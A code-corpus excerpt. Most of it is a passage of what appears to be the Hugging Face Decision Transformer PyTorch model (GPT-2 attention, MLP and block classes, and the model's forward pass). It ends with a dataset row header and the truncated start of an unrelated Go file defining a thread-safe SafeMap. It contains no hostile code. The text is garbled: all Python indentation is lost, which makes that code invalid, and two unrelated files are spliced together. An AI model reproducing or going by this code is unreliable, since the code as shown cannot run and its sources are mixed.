# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info(f"Loading TF weight {name} with shape {shape}")
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array.squeeze())
for name, array in zip(names, arrays):
name = name[6:] # skip "model/"
name = name.split("/")
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
try:
assert (
pointer.shape == array.shape
), f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched"
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info(f"Initialize PyTorch weight {name}")
pointer.data = torch.from_numpy(array)
return model
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2Attention with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2Attention(nn.Module):
def __init__(self, config, is_cross_attention=False, layer_idx=None):
super().__init__()
max_positions = config.max_position_embeddings
self.register_buffer(
"bias",
torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view(
1, 1, max_positions, max_positions
),
)
self.register_buffer("masked_bias", torch.tensor(-1e4))
self.embed_dim = config.hidden_size
self.num_heads = config.num_attention_heads
self.head_dim = self.embed_dim // self.num_heads
self.split_size = self.embed_dim
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
f" {self.num_heads})."
)
self.scale_attn_weights = config.scale_attn_weights
self.is_cross_attention = is_cross_attention
# Layer-wise attention scaling, reordering, and upcasting
self.scale_attn_by_inverse_layer_idx = config.scale_attn_by_inverse_layer_idx
self.layer_idx = layer_idx
self.reorder_and_upcast_attn = config.reorder_and_upcast_attn
if self.is_cross_attention:
self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
else:
self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
self.num_heads = self.num_heads - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, query, key, value, attention_mask=None, head_mask=None):
attn_weights = torch.matmul(query, key.transpose(-1, -2))
if self.scale_attn_weights:
attn_weights = attn_weights / torch.full(
[], value.size(-1) ** 0.5, dtype=attn_weights.dtype, device=attn_weights.device
)
# Layer-wise attention scaling
if self.scale_attn_by_inverse_layer_idx:
attn_weights = attn_weights / float(self.layer_idx + 1)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]
mask_value = torch.finfo(attn_weights.dtype).min
# Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.
# Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`
mask_value = torch.full([], mask_value, dtype=attn_weights.dtype).to(attn_weights.device)
attn_weights = torch.where(causal_mask, attn_weights.to(attn_weights.dtype), mask_value)
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
# Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op otherwise
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _upcast_and_reordered_attn(self, query, key, value, attention_mask=None, head_mask=None):
# Use `torch.baddbmm` (a bit more efficient w/ alpha param for scaling -- from Megatron-LM)
bsz, num_heads, q_seq_len, dk = query.size()
_, _, k_seq_len, _ = key.size()
# Preallocate attn_weights for `baddbmm`
attn_weights = torch.empty(bsz * num_heads, q_seq_len, k_seq_len, dtype=torch.float32, device=query.device)
# Compute Scale Factor
scale_factor = 1.0
if self.scale_attn_weights:
scale_factor /= float(value.size(-1)) ** 0.5
if self.scale_attn_by_inverse_layer_idx:
scale_factor /= float(self.layer_idx + 1)
# Upcast (turn off autocast) and reorder (Scale K by 1 / root(dk))
with autocast(enabled=False):
q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
mask_value = torch.finfo(attn_weights.dtype).min
# Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.
# Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`
mask_value = torch.tensor(mask_value, dtype=attn_weights.dtype).to(attn_weights.device)
attn_weights = torch.where(causal_mask, attn_weights, mask_value)
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
# Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op if otherwise
if attn_weights.dtype != torch.float32:
raise RuntimeError("Error with upcasting, attn_weights does not have dtype torch.float32")
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(new_shape)
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
tensor = tensor.permute(0, 2, 1, 3).contiguous()
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def forward(
self,
hidden_states: Optional[Tuple[torch.FloatTensor]],
layer_past: Optional[Tuple[torch.Tensor]] = None,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> Tuple[Union[torch.Tensor, Tuple[torch.Tensor]], ...]:
if encoder_hidden_states is not None:
if not hasattr(self, "q_attn"):
raise ValueError(
"If class is used as cross attention, the weights `q_attn` have to be defined. "
"Please make sure to instantiate class with `DecisionTransformerGPT2Attention(..., is_cross_attention=True)`."
)
query = self.q_attn(hidden_states)
key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
attention_mask = encoder_attention_mask
else:
query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key, past_value = layer_past
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
if self.reorder_and_upcast_attn:
attn_output, attn_weights = self._upcast_and_reordered_attn(query, key, value, attention_mask, head_mask)
else:
attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.c_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2MLP with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2MLP(nn.Module):
def __init__(self, intermediate_size, config):
super().__init__()
embed_dim = config.hidden_size
self.c_fc = Conv1D(intermediate_size, embed_dim)
self.c_proj = Conv1D(embed_dim, intermediate_size)
self.act = ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, hidden_states: Optional[Tuple[torch.FloatTensor]]) -> torch.FloatTensor:
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2Block with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2Block(nn.Module):
def __init__(self, config, layer_idx=None):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = DecisionTransformerGPT2Attention(config, layer_idx=layer_idx)
self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
if config.add_cross_attention:
self.crossattention = DecisionTransformerGPT2Attention(
config, is_cross_attention=True, layer_idx=layer_idx
)
self.ln_cross_attn = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = DecisionTransformerGPT2MLP(inner_dim, config)
def forward(
self,
hidden_states: Optional[Tuple[torch.FloatTensor]],
layer_past: Optional[Tuple[torch.Tensor]] = None,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> Union[Tuple[torch.Tensor], Optional[Tuple[torch.Tensor, Tuple[torch.FloatTensor, ...]]]]:
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
if encoder_hidden_states is not None:
# add one self-attention block for cross-attention
if not hasattr(self, "crossattention"):
raise ValueError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
"cross-attention layers by setting `config.add_cross_attention=True`"
)
residual = hidden_states
hidden_states = self.ln_cross_attn(hidden_states)
cross_attn_outputs = self.crossattention(
hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
attn_output = cross_attn_outputs[0]
# residual connection
hidden_states = residual + attn_output
outputs = outputs + cross_attn_outputs[2:] # add cross attentions if we output attention weights
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
if use_cache:
outputs = (hidden_states,) + outputs
else:
outputs = (hidden_states,) + outputs[1:]
return outputs # hidden_states, present, (attentions, cross_attentions)
class DecisionTransformerGPT2PreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = DecisionTransformerConfig
load_tf_weights = load_tf_weights_in_gpt2
base_model_prefix = "transformer"
is_parallelizable = True
supports_gradient_checkpointing = True
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, (nn.Linear, Conv1D)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
# Reinitialize selected weights subject to the OpenAI GPT-2 Paper Scheme:
# > A modified initialization which accounts for the accumulation on the residual path with model depth. Scale
# > the weights of residual layers at initialization by a factor of 1/√N where N is the # of residual layers.
# > -- GPT-2 :: https://openai.com/blog/better-language-models/
#
# Reference (Megatron-LM): https://github.com/NVIDIA/Megatron-LM/blob/main/megatron/model/gpt_model.py
for name, p in module.named_parameters():
if "c_proj" in name and "weight" in name:
# Special Scaled Initialization --> There are 2 Layer Norms per Transformer Block
p.data.normal_(mean=0.0, std=(self.config.initializer_range / math.sqrt(2 * self.config.n_layer)))
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, DecisionTransformerGPT2Model):
module.gradient_checkpointing = value
class DecisionTransformerGPT2Model(DecisionTransformerGPT2PreTrainedModel):
_keys_to_ignore_on_load_missing = ["attn.masked_bias"]
def __init__(self, config):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList(
[DecisionTransformerGPT2Block(config, layer_idx=i) for i in range(config.num_hidden_layers)]
)
self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
# Model parallel
self.model_parallel = False
self.device_map = None
self.gradient_checkpointing = False
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2Model.forward
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# GPT2Attention mask.
if attention_mask is not None:
if batch_size <= 0:
raise ValueError("batch_size has to be defined and > 0")
attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask[:, None, None, :]
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and the dtype's smallest value for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.add_cross_attention and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.n_layer)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
if self.gradient_checkpointing and self.training:
if use_cache:
logger.warning_once(
"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
)
use_cache = False
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
# Model parallel
if self.model_parallel:
torch.cuda.set_device(hidden_states.device)
# Ensure layer_past is on same device as hidden_states (might not be correct)
if layer_past is not None:
layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
# Ensure that attention_mask is always on the same device as hidden_states
if attention_mask is not None:
attention_mask = attention_mask.to(hidden_states.device)
if isinstance(head_mask, torch.Tensor):
head_mask = head_mask.to(hidden_states.device)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask[i],
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
# Model Parallel: If it's the last layer for that device, put things on the next device
if self.model_parallel:
for k, v in self.device_map.items():
if i == v[-1] and "cuda:" + str(k) != self.last_device:
hidden_states = hidden_states.to("cuda:" + str(k + 1))
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
@dataclass
class DecisionTransformerOutput(ModelOutput):
"""
Base class for model's outputs that also contains a pooling of the last hidden states.
Args:
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
state_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, state_dim)`):
Environment state predictions
action_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, action_dim)`):
Model action predictions
return_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, 1)`):
Predicted returns for each state
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
state_preds: torch.FloatTensor = None
action_preds: torch.FloatTensor = None
return_preds: torch.FloatTensor = None
hidden_states: torch.FloatTensor = None
attentions: torch.FloatTensor = None
last_hidden_state: torch.FloatTensor = None
class DecisionTransformerPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = DecisionTransformerConfig
base_model_prefix = "decision_transformer"
main_input_name = "states"
supports_gradient_checkpointing = False
_keys_to_ignore_on_load_missing = [r"position_ids"]
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, nn.Linear):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
DECISION_TRANSFORMER_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`~DecisionTransformerConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
DECISION_TRANSFORMER_INPUTS_DOCSTRING = r"""
Args:
states (`torch.FloatTensor` of shape `(batch_size, episode_length, state_dim)`):
The states for each step in the trajectory
actions (`torch.FloatTensor` of shape `(batch_size, episode_length, act_dim)`):
The actions taken by the "expert" policy for the current state, these are masked for auto regressive
prediction
rewards (`torch.FloatTensor` of shape `(batch_size, episode_length, 1)`):
The rewards for each state, action
returns_to_go (`torch.FloatTensor` of shape `(batch_size, episode_length, 1)`):
The returns for each state in the trajectory
timesteps (`torch.LongTensor` of shape `(batch_size, episode_length)`):
The timestep for each step in the trajectory
attention_mask (`torch.LongTensor` of shape `(batch_size, episode_length)`):
Masking, used to mask the actions when performing autoregressive prediction
"""
@add_start_docstrings("The Decision Transformer Model", DECISION_TRANSFORMER_START_DOCSTRING)
class DecisionTransformerModel(DecisionTransformerPreTrainedModel):
"""
The model builds upon the GPT2 architecture to perform autoregressive prediction of actions in an offline RL
setting. Refer to the paper for more details: https://arxiv.org/abs/2106.01345
"""
def __init__(self, config):
super().__init__(config)
self.config = config
self.hidden_size = config.hidden_size
# note: the only difference between this GPT2Model and the default Huggingface version
# is that the positional embeddings are removed (since we'll add those ourselves)
self.encoder = DecisionTransformerGPT2Model(config)
self.embed_timestep = nn.Embedding(config.max_ep_len, config.hidden_size)
self.embed_return = torch.nn.Linear(1, config.hidden_size)
self.embed_state = torch.nn.Linear(config.state_dim, config.hidden_size)
self.embed_action = torch.nn.Linear(config.act_dim, config.hidden_size)
self.embed_ln = nn.LayerNorm(config.hidden_size)
# note: we don't predict states or returns for the paper
self.predict_state = torch.nn.Linear(config.hidden_size, config.state_dim)
self.predict_action = nn.Sequential(
*([nn.Linear(config.hidden_size, config.act_dim)] + ([nn.Tanh()] if config.action_tanh else []))
)
self.predict_return = torch.nn.Linear(config.hidden_size, 1)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(DECISION_TRANSFORMER_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=DecisionTransformerOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
states=None,
actions=None,
rewards=None,
returns_to_go=None,
timesteps=None,
attention_mask=None,
output_hidden_states=None,
output_attentions=None,
return_dict=None,
) -> Union[Tuple, DecisionTransformerOutput]:
r"""
Returns:
Examples:
```python
>>> from transformers import DecisionTransformerModel
>>> import torch
>>> model = DecisionTransformerModel.from_pretrained("edbeeching/decision-transformer-gym-hopper-medium")
>>> # evaluation
>>> model = model.to(device)
>>> model.eval()
>>> env = gym.make("Hopper-v3")
>>> state_dim = env.observation_space.shape[0]
>>> act_dim = env.action_space.shape[0]
>>> state = env.reset()
>>> states = torch.from_numpy(state).reshape(1, 1, state_dim).to(device=device, dtype=torch.float32)
>>> actions = torch.zeros((1, 1, act_dim), device=device, dtype=torch.float32)
>>> rewards = torch.zeros(1, 1, device=device, dtype=torch.float32)
>>> target_return = torch.tensor(TARGET_RETURN, dtype=torch.float32).reshape(1, 1)
>>> timesteps = torch.tensor(0, device=device, dtype=torch.long).reshape(1, 1)
>>> attention_mask = torch.zeros(1, 1, device=device, dtype=torch.float32)
>>> # forward pass
>>> with torch.no_grad():
... state_preds, action_preds, return_preds = model(
... states=states,
... actions=actions,
... rewards=rewards,
... returns_to_go=target_return,
... timesteps=timesteps,
... attention_mask=attention_mask,
... return_dict=False,
... )
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
batch_size, seq_length = states.shape[0], states.shape[1]
if attention_mask is None:
# attention mask for GPT: 1 if can be attended to, 0 if not
attention_mask = torch.ones((batch_size, seq_length), dtype=torch.long)
# embed each modality with a different head
state_embeddings = self.embed_state(states)
action_embeddings = self.embed_action(actions)
returns_embeddings = self.embed_return(returns_to_go)
time_embeddings = self.embed_timestep(timesteps)
# time embeddings are treated similar to positional embeddings
state_embeddings = state_embeddings + time_embeddings
action_embeddings = action_embeddings + time_embeddings
returns_embeddings = returns_embeddings + time_embeddings
# this makes the sequence look like (R_1, s_1, a_1, R_2, s_2, a_2, ...)
# which works nice in an autoregressive sense since states predict actions
stacked_inputs = (
torch.stack((returns_embeddings, state_embeddings, action_embeddings), dim=1)
.permute(0, 2, 1, 3)
.reshape(batch_size, 3 * seq_length, self.hidden_size)
)
stacked_inputs = self.embed_ln(stacked_inputs)
# to make the attention mask fit the stacked inputs, have to stack it as well
stacked_attention_mask = (
torch.stack((attention_mask, attention_mask, attention_mask), dim=1)
.permute(0, 2, 1)
.reshape(batch_size, 3 * seq_length)
)
device = stacked_inputs.device
# we feed in the input embeddings (not word indices as in NLP) to the model
encoder_outputs = self.encoder(
inputs_embeds=stacked_inputs,
attention_mask=stacked_attention_mask,
position_ids=torch.zeros(stacked_attention_mask.shape, device=device, dtype=torch.long),
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
x = encoder_outputs[0]
# reshape x so that the second dimension corresponds to the original
# returns (0), states (1), or actions (2); i.e. x[:,1,t] is the token for s_t
x = x.reshape(batch_size, seq_length, 3, self.hidden_size).permute(0, 2, 1, 3)
# get predictions
return_preds = self.predict_return(x[:, 2]) # predict next return given state and action
state_preds = self.predict_state(x[:, 2]) # predict next state given state and action
action_preds = self.predict_action(x[:, 1]) # predict next action given state
if not return_dict:
return (state_preds, action_preds, return_preds)
return DecisionTransformerOutput(
last_hidden_state=encoder_outputs.last_hidden_state,
state_preds=state_preds,
action_preds=action_preds,
return_preds=return_preds,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
|
2833844911/gojsvmp | 4,998 | object/object.go | package object
import (
"encoding/hex"
"myvmp/ast"
"myvmp/token"
"strconv"
"strings"
"sync"
)
// SafeMap 是一个线程安全的map结构
type SafeMap struct {
mu sync.RWMutex
M map[string]Object
}
// NewSafeMap 创建一个新的SafeMap实例
func NewSafeMap() *SafeMap {
return &SafeMap{
M: make(map[string]Object),
}
}
// Set 在SafeMap中设置键值对
func (sm *SafeMap) Set(key string, value Object) {
sm.mu.Lock()
defer sm.mu.Unlock()
sm.M[key] = value
}
// Get 从SafeMap中获取指定键的值
func (sm *SafeMap) Get(key string) (Object, bool) {
sm.mu.RLock()
defer sm.mu.RUnlock()
value, ok := sm.M[key]
return value, ok
}
// Delete 从SafeMap中删除指定键的值
func (sm *SafeMap) Delete(key string) {
sm.mu.Lock()
defer sm.mu.Unlock()
